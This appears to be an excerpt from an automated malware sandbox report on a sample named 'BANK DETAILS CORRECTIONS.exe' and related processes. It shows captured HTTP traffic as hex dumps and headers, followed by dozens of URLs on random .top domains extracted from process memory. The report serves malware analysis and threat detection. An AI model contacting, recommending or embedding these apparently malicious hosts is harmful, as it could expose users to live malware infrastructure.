3d 07 62 1c 69 fa 3c e7 7f aa ed 3b 95 c1 7f d3 54 46 df 94 96 2c 0e 7e 94 7e 94 4b df 53 2a c7 36 8b 93 d4 68 2c e9 f7 94 49 4a 72 bf 3f 2c 29 fd f8 8f 72 89 c5 c7 28 0e 52 30 16 54 50 05 b1 1f 5b 95 7c 50 58 38 67 71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce Data Ascii: 1faar-l
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 13:48:36 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Endurance-Cache-Level: 2X-nginx-cache: WordPressTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc b2 db 72 db ca 92 2d fa 6c 7f 05 16 15 6b cb 9e 8b 00 41 90 94 44 ea b2 96 2d 5b 12 25 59 b6 75 a3 c4 ee 0e 47 a1 aa 08 94 58 40 c1 55 05 5e a4 f0 c7 f4 07 ec a7 fd b6 5f 4e c4 ee 1f 3b 59 00 78 93 a8 8b ed 39 fb ec 38 b2 09 a0 b2 32 47 8e 1c 39 b6 fe f6 e1 f3 ee f9 f5 97 8f 56 a8 23 be b3 65 9e 16 47 71 b0 5d a2 aa 04 67 8a c8 ce 56 44 35 b2 70 88 a4 a2 7a bb 74 71 be 67 6f 94 8a 68 8c 22 ba 5d 1a 30 3a 4c 84 d4 25 0b 8b 58 d3 18 b2 86 8c e8 70 9b d0 01 c3 d4 ce 0e 65 8b c5 4c 33 c4 6d 85 11 a7 db 55 c0 e0 2c ee 5b 92 f2 ed 52 22 45 8f 71 5a b2 42 49 7b db a5 50 eb 44 b5 2a 95 20 4a 02 47 c8 a0 32 ea c5 95 6a 75 a1 ed aa 14 be d0 6a 75 da 74 35 16 2c 26 74 54 b6 7a 82 73 31 5c b5 2a 3b 5b 9a 69 4e 77 be a0 80 5a b1 d0 70 93 c6 c4 b2 ad 4f 9f 2f db 9f da 1f 4f ce 3f 5b 87 17 97 f0 be f8 60 ed 7e fe 74 71 d2 3e 7f 77 da 7e b7 55 c9 eb f2 76 40 2e a1 52 8f b7 4b 22 68 71 61 e8 cf 8d 4a d5 b7 8f 67 25 d3 eb 61 72 86 32 97 fb b3 3c 1e 81 55 4c d3 6f 46 84 39 e8 17 20 59 5b 0a 4b 96 68 4b 8f 13 58 1b 4a 12 ce 30 d2 4c c4 15 4e fe 71 a3 44 0c 78 1c 29 b5 5d 1a 0b a4 34 6c 2a a4 11 b2 03 89 92 b0 b4 73 57 fa 57 d6 6d a4 4b ad e9 86 f2 14 b3 a3 52 b9 f4 af 3c b3 f5 6f 90 6a 7a 40 5e 87 fa 67 c0 d6 5c 32 32 57 17 de 0e 1d 34 d0 8e a6 11 58 07 c9 b1 63 86 aa ac 0c a9 af f2 fc 54 f2 e7 f3 21 2f d3 a1 f5 ec fc e5 12 a1 f9 f8 30 2f e4 43 20 11 46 3a b0 e4 3b 9c 07 e7 78 9f 51 24 71 58 5c 94 4b 1a c9 80 c2 dc b3 84 8f b1 96 e3 2f e0 38 9d 73 
3d 07 62 1c 69 fa 3c e7 7f aa ed 3b 95 c1 7f d3 54 46 df 94 96 2c 0e 7e 94 7e 94 4b df 53 2a c7 36 8b 93 d4 68 2c e9 f7 94 49 4a 72 bf 3f 2c 29 fd f8 8f 72 89 c5 c7 28 0e 52 30 16 54 50 05 b1 1f 5b 95 7c 50 58 38 67 71 df 92 94 6f af 92 58 d9 89 a4 3d aa 71 b8 6a 85 f0 b5 bd fa 18 c5 55 63 bb e7 4a 23 34 c2 24 76 7c 21 34 d0 41 89 39 60 11 cd 6a f3 c4 89 18 3d b0 8e 72 02 a5 c1 70 38 4f c4 52 28 25 24 0b 58 9c 37 82 26 e0 b0 98 62 bd c8 a0 84 38 8c 1d 1b 75 97 78 57 2a f5 8f 51 c4 e1 8a 69 0e 77 cf 38 c1 fa 1f 12 7d 4f c5 a6 b5 47 29 29 e5 2c 9f 5b 59 0f 52 2b a5 ff 26 4e 16 a1 16 17 ca 02 8d c0 9e 48 32 a1 5e 48 13 2a 4c 89 9a f1 b5 b6 72 2b 00 66 8f 4a 4b 49 bc 5d 22 48 a3 96 a6 23 5d b9 41 03 94 df 6f fa 48 d1 b5 7a 79 97 6d 7c 6f 7f 18 86 1d f7 e4 e3 d7 cb d3 f7 9d f1 bb ef c7 c3 a4 86 3a 8d be 5f c3 e9 55 8d 0c bb 9d ea 00 45 fc bc 7b 75 ea 42 3c c6 e3 77 cd f6 81 62 d7 d1 de 6d f7 f2 72 ec ef b6 d7 da 51 e8 92 83 f7 b7 9f f9 70 70 b5 db bc 3d 8e 71 ea d7 0e 63 f8 4e fc ce Data Ascii: 1faar-l
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 18 Mar 2024 13:48:39 GMT
                Server: Apache
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                Upgrade: h2,h2c
                Connection: Upgrade
                Vary: Accept-Encoding
                Content-Encoding: gzip
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 18 Mar 2024 13:48:42 GMT
                Server: nginx/1.23.4
                Content-Type: text/html; charset=UTF-8
                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                Cache-Control: no-cache, must-revalidate, max-age=0
                Link: <https://hzw.avt.temporary.site/wp-json/>; rel="https://api.w.org/"
                Vary: Accept-Encoding
                X-Endurance-Cache-Level: 2
                X-nginx-cache: WordPress
                Transfer-Encoding: chunked
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 18 Mar 2024 13:49:01 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 18 Mar 2024 13:49:03 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 18 Mar 2024 13:49:06 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 18 Mar 2024 13:49:09 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: close
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://p97bz5o.9rij9.top/3f82i/ffp.xlsx
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.0000000003E12000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://parkingpage.namecheap.com
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://q8s.cjncj.top/26zhgy/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://qs8b6.89of0.top/jxq/1fu9.ppt
                Source: BANK DETAILS CORRECTIONS.exe, 00000000.00000002.1295194192.0000000002E1B000.00000004.00000800.00020000.00000000.sdmp, fcLfLlfpmjf.exe, 0000000D.00000002.1361939859.00000000028EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://t17a.77bdh.top/uwfn7k7/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://uj66st1.1lilr.top/lsqbk0/i9kj.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ut49ty3.jsj91.top/bcjz/bokt.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wi6o.k831s.top/7rs/rj5r1.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wuka.gjgmm.top/9ii7k/
                Source: sdiagnhost.exe, 00000015.00000003.1627416777.0000000007D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                Source: EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/08og/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/1dys/2jgjq.docx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/1zn1q/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/2jtdy62/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/2r7b/mulenc.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/302/riold.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/3iwe/ay869g.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/4d7o8gx/wpst3.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/5wkvv6a/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/6neav/srn3y3.xls
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/7fdwd/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/7qe/8l9zr.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/82shuw/dx44.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/a5y1q3v/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/aek2/l7bry89.html
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/aoekqf/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/can/czydx.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/e8miho/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/foxkl2/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/hnvto/h15.html
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/hw8q/jt5zl.docx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/idvro/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/ik0/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/ju0/u2ln.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/l1qnt/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/m1o3h5q/
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/mdqixpy/vbk.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/min9s/q9e4xv.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/n90o/x6eagu.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/qii/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/sw1bs0t/qq05.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/ute33wk/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/vgjem/z1zm.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/wbb8f/mzs.pptx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.oc7o0.top/xw7ci9/7fkzpf.docx
                Source: EnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.roblesprats.com
                Source: EnKifmZDGZ.exe, 00000019.00000002.3736975919.00000000053B5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.roblesprats.com/e6xn/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://xorep.s0kfn.top/6d1fct9/xg0p8x.ppt
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://xr3f3p.1cva0.top/n1qm0f/kn1v2.xlsx
                Source: sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://0g2i8k.1cva0.top/oq6dhnh/zkfvtu.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://4mt4jb.ko6sc.top/6d92ec/oicfh3p.doc
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://4qghtl.7vp7f.top/zmhkm1/ydumpca.docx
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://5hm.u3gee.top/u4g28a/
                Source: sdiagnhost.exe, 00000015.00000002.3738117615.00000000071B0000.00000004.00000800.00020000.00000000.sdmp, sdiagnhost.exe, 00000015.00000002.3735432410.000000000549C000.00000004.10000000.00040000.00000000.sdmp, EnKifmZDGZ.exe, 00000019.00000002.3734561340.000000000395C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://61t.9nn9e.top/swk75l2/6a0.pptx
